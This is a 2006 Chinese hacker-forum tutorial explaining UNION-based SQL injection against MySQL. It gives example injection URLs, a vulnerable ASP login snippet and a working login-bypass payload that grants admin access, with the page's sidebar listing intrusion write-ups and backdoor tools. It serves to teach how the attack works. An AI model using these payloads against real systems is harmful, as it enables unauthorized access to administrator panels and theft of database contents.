黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]利用union查询进行MYSQL注入的详细说明
      ★★★★★

利用union查询进行MYSQL注入的详细说明

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-9-24 10:25:30
以前看了很多关于利用union查询进行MYSQL注入的例子,觉得自己懂了,现在才知道其实以前的理解是有偏差的!

举个例子www.xxx.com/nn.php?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9/* 这里首先是猜到了有九个字段,然后呢?在本来应该是显示第一个字段内容的地方显示1(其实是构造第一个字段的查询结果为1),依次类推!同样,我们可以更换语句为
www.xxx.com/nn.php?id=1 and 1=2 union select user(),2,3,4,5,6,7,8,9/*,这样就是在本来应该显示第一个字段内容的地方显示数据库连接帐号!

接着说在剑心那里看到的一个分析来加深理解!先看段程序

<%
username=request("username") '接受管理员用户名
password=request("password") '接受管理员密码
keys=request("keys")
mm=0
%>
<!--#include file="conn.asp"-->
<%
if username<>"" and password<>"" then
set rs=newconn.execute("select * from admin where username='"& username & "'") '判断是否存在该用户
if not (rs.bof and rs.eof) then '判断是否有该权限
if rs("password")=password then
session("password")=rs("password") '为真则将该用户的该权限放入SESSION中
Response.Redirect "admin.asp" '跳转到管理员管理页面
else
mm=1
end if
else
mm=2
end if
elseif keys="submit" then
mm=3
end if
%>

这里直接把username放进了数据库查询语句,很明显是可以注入的,但是剑心直接构造了一个语句就可以进后台了,看下语句
提交用户名为

' union select 1,1,1 from admin where '1'='1

密码为
1
为什么呢?一起分析下!
首先看查询语句 select * from admin where username='"& username & "'
前面的 ' 是闭合查询语句的 ' ,然后在后面加了个union查询union select 1,1,1 from admin where '1'='1
这里其实是构造查询的所有字段都为1,理所当然密码也为1了,所以密码输入1就进后台了!
这里union select 1,1,1 为什么是3个1呢,应该是因为他有3个字段吧!
好了,对这个union查询的初步了解就是这么多了!
文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体:
    中介交易区
    最 新 热 门
    实例讲解跨站入侵攻防战之攻击篇05-08
    对偶偶娱乐分站服务器的安全检测04-23
    入侵88red系统的详细过程04-07
    对趋势科技等数万网站被攻击的分03-21
    凡人网络购物系统 V8.0 简体中文03-18
    linux平台下渗透日本著名XXXXXX.03-18
    搜索框所引起的XSS漏洞03-05
    跳转漏洞的利用03-05
    对复旦大学的一次漫长渗透03-03
    .net一句话马以及dx论坛拿shell03-01
    php渗透入侵过程图文详解03-01
    DJ网站的入侵详细过程02-26
    相 关 文 章
    MySQL数据库安全配置指南
    MYSQL 注入精华
    Union查询注入技巧
    MySQL Proxy(解决注入的另一思路)
    php+mysql 5 sql injection 暴取工具be
    phpshell中执行sql查询或系统命令时出错
    MySQL密码恢复方法
    Fizwig提供5G免费空间,支持php/MySql
    美国免费php空间,支持Mysql/ftp上传
    Yphs.eu免费主页空间,支持php/mysql
    aGigForFree提供1G免费php空间,支持My
    234mb提供18G免费空间,支持php/MySQL
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886